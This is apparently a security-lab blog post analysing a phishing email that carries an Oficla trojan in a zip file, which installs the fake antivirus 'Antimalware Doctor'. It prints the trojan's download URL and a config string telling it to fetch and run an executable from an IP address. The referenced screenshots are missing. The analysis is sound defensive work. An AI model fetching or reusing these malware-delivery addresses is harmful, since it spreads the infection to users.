Trojan “Oficla” pushesh Rogueware “Antimalware Doctor”

We have analyzed a suspicious email in our security lab that email shown below

Above email has an attachment. This attachment is a zip archive which contain a trojan oficla variant. This trojan has a Microsoft word file icon.

Upon execution it downloads below script file.

https://ilovelasvegas.ru/web/St/bb.php?v=200&id=881716830&b=23avgust&tm=72

The script contains string as shown below:

“[info]runurl:https://91.204.48.46/kasuli.exe|taskid:39|delay:15|upd:0|backurls:[/info]”

It then downloads and executes the file from above URL. Which in turn installs the Rogueware Antimalware Doctor on the users machine.

The Rogueware displays fake threat messages and forces the user for registration and purchasing the product.

The Rogueware Antimalware Doctor looks like as shown below:

Pravesh Shinde

Pravesh Shinde


No Comments, Be The First!

Your email address will not be published.

CAPTCHA Image